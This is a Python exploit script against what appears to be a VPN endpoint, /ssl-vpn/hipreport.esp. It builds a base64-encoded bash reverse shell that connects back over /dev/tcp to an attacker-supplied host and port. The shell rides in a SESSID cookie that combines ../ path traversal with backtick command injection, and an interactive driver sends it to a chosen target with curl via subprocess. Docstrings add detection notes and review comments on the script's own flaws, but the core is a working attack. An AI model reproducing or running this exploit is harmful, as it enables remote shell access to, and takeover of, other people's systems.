import subprocess
import base64
def generate_reverse_shell(lhost, lport):
    """Return the base64 text of a bash one-liner that connects back to lhost:lport.

    The decoded command starts an interactive bash whose stdin/stdout/stderr
    are redirected to a TCP connection opened through bash's /dev/tcp
    pseudo-device.

    Detection notes: on the receiving host the decoded form shows up as a
    ``bash -i`` process with a ``/dev/tcp/<host>/<port>`` redirection, paired
    with an outbound TCP connection to that host and port. The base64 form
    carries no spaces or quotes, so the plain text will not appear in the
    request that delivers it; match on the ``base64 -d | bash`` wrapper that
    ``generate_curl_command`` builds around it instead.

    Args:
        lhost: Host the shell connects back to (interpolated as-is).
        lport: Port the shell connects back to (interpolated as-is).

    Returns:
        The base64-encoded command as a ``str``.
    """
    payload_bytes = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1".encode()
    return base64.b64encode(payload_bytes).decode()
def generate_curl_command(IP, encoded_reverse_shell):
    """Build the curl command line (as one shell string) that carries the payload.

    The request is a POST to ``/ssl-vpn/hipreport.esp`` whose ``SESSID``
    cookie is not a session id but a path: ``/../`` traversal sequences
    leading into ``/opt/panlogs/tmp/device_telemetry/minute/``, followed by a
    file name that embeds a backtick command substitution. ``${IFS}`` stands
    in for spaces inside that substitution.
    NOTE(review): how the target turns that file name into command execution
    is not shown in this file; presumably a later job passes the name to a
    shell. Confirm against the vendor advisory.

    Detection and mitigation notes, from the string built here:
      * request logs: a ``SESSID`` cookie on ``/ssl-vpn/hipreport.esp``
        containing ``..``, a backtick, ``${IFS}`` or ``|``;
      * file system: entries under
        ``/opt/panlogs/tmp/device_telemetry/minute/`` whose names contain
        shell metacharacters;
      * a session identifier should be validated against a strict format
        before it is used to build any path.

    ``-k`` turns off TLS certificate verification and ``-s`` silences curl's
    progress output.

    Args:
        IP: Host or address placed in the request URL (interpolated as-is).
        encoded_reverse_shell: Base64 text placed inside the cookie.

    Returns:
        The complete command line as a ``str``.
    """
    request_part = f"curl -s -X POST 'https://{IP}/ssl-vpn/hipreport.esp' -k "
    cookie_part = f"-H 'Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaa`echo${{IFS}}{encoded_reverse_shell}|base64${{IFS}}-d|bash`'"
    return request_part + cookie_part
# Interactive driver: read three values, build the command line, run it once.
# None of the three inputs is validated or quoted before use.
IP = input("Enter the vulnerable target IP/Host: ")
lhost = input("Enter the IP/Host for reverse shell: ")
lport = input("Enter the port for reverse shell: ")
encoded_reverse_shell = generate_reverse_shell(lhost, lport)
curl_command = generate_curl_command(IP, encoded_reverse_shell)
try:
    # NOTE(review): shell=True hands the whole string to the local shell, and
    # IP is interpolated into it unescaped, so a quote or other metacharacter
    # typed at the first prompt is interpreted on the machine running this
    # script. lhost/lport are base64-encoded before they reach the string.
    # stdout and stderr are captured and then discarded, so the server's
    # response is never inspected.
    subprocess.run(curl_command, shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # NOTE(review): reaching this line only means curl exited with status 0.
    # curl is not run with --fail, so an HTTP error response also ends up
    # here; the message is not evidence about the state of the remote host.
    print("Reverse shell successfully launched. Please wait.")
except subprocess.CalledProcessError:
    # check=True raises this on a non-zero curl exit status, e.g. a
    # connection failure.
    print("Error occurred while launching reverse shell.")